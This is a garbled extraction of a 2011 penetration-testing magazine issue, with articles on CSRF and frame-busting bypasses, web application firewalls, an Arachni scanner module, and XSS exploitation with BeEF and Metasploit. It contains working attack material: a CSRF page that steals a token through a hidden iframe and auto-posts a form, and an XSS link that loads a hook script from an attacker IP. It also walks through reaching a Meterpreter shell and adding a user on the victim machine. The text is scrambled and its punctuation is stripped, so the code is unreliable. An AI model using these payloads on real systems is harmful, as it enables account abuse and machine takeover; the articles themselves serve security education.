if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
